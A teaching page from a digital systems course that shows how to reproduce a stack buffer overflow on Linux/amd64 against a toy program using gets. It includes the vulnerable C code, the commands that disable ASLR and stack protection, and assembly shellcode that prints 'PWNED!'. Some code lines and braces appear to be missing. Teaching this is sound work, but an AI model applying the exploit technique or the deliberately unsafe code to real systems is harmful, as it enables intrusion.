Buffer overruns on Linux (Digital Systems)

Copyright © 2024 J. M. Spivey
Jump to navigation Jump to search

Let's try to reproduce on Linux/amd64 the attack that was made on the micro:bit. Here's a Linux version of the milk bill program:

#include <stdio.h>
#include <stdlib.h>

char *gets(char *buf);

int getnum(void) {
    char buf[64];
    return atoi(buf);

int main(void) {
    int milk[10];

    for (int i = 0; i < 10; i++) {
        int x = getnum();
        printf("Input %d = %d\n", i, x);
        milk[i] = x;

(I've omitted the boring bit that adds up the bill at the end.) You will note that getnum's buffer has been expanded to 64 bytes in order to accommodate the rather less compact code we will write for the AMD64.

Just getting this program compiled is a bit difficult, because on recent Linux systems, omitting the explicit declaration of gets results in the message,

milk86.c:6:5: warning: implicit declaration of function ‘gets’

(because the function is no longer declared in stdio.h), and even with the declaration we still get a warning from the linker.

milk86.c:(.text+0x15): warning: the `gets' function is dangerous and should not be used.

That's about right!

Next, we find that the address of the array buf varies from one invocation of the program to the next, because of a Linux feature called ASLR or address space layout randomisation, designed precisely to defeat attacks like ours that depend on knowing the addresses of parts of a running program.

We can temporarily disable ASLR by starting a new shell with the command,

$ setarch `uname -m` -R /bin/bash

Here, the -R requests no ASLR in processes started from the new shell. When you've finished experimenting, you can exit that shell and return to safety.

With ALSR disabled, you can discover the (now fixed) address of buf, either by using a debugger, or by inserting into getnum the line

printf("%llx\n", (unsigned long long) buf);

that prints out the address of buf as a 64-bit number in hexadecimal.

The next task is to write an attack string. This time we will be careful that the attack string is swallowed whole by the Linux implementation of gets, which is advertised as reading up to the end of a line of input, or to the end of the file, whichever comes first. It turns out that gets will quite happily read past zero bytes in the input and store them, even though according to the usual C conventions a zero byte marks the end of a string. If we want to print a newline, however, we must be careful to do so without including a newline in the attack string, and we will take suitable care over that.

On the micro:bit, we output our ransom note by calling printf, a subroutine that existed at a known location in memory. Here, instead of trying to locate library routines, it's easier to invoke Linux system calls directly, something we can do by setting the registers to appropriate values and executing a syscall instruction. The assembly code below is equivalent to the C statements

write(1, "PWNED!\n", 7); exit(0);

with both write and exit being Linux system calls. Without further ado, here is my code for the attack string. The instructions are, naturally enough, written in assembly language for the AMD64, rather than the ARM/Thumb.

    .equ frame, 0x7fffffffe690 # Address of stack frame

    .global _start
    movl $1, %eax              # System call 1: write(fd, buf, n)
    movl $1, %edi              # ... on standard output
    leaq message(%rip), %rsi   # ... with our message
    incb 6(%rsi)               # Fix the newline
    movl $7, %edx              # ... 7 characters
    syscall                    # Perform the system call

    movl $60, %eax             # System call 60: exit(status)
    movl $0, %edi              # ... with status 0
    syscall                    # Perform the call

    .p2align 2, 0
    .asciz "PWNED!\009"        # '\009' will be replaced by newline

    .p2align 6, 0
    .quad 0
    .quad frame

Note the sneaky computation of the newline character 0xa by incrementing the character 0x9: this avoids having 0xa appear as a byte in the instruction stream. Including the label _start makes it possible to run the assembler output through the linker and execute it directly for debugging.

To make the attack string, we need to produce a raw binary image, using the commands

$ as attack.s -o attack.o
$ objcopy -O binary attack.o -o attack

Now invoking the milk program with attack as its input still doesn't get us "PWNED!":

$ ./milk <attack
Segmentation fault

We have certainly managed to crash the program, but we have not bent it to our will.

There remains one further defence in place: by default, the segment of storage that contains the run-time stack is marked as non-executable, so that attempting to jump into it results in the program's stopping with a segmentation fault. Normally, that's a good thing because it thwarts attacks like ours. But it is possible to mark a program as requiring an executable stack segment, and this is used in certain programming techniques that involve generating small fragments of code dynamically. We can make the milk program vulnerable using a program called execstack (on Debian, you might need to install it first, and it's tucked away in /usr/sbin out of the way of noobs).

$ /usr/sbin/execstack -s milk

Now the attack hits home!

$ ./milk <attack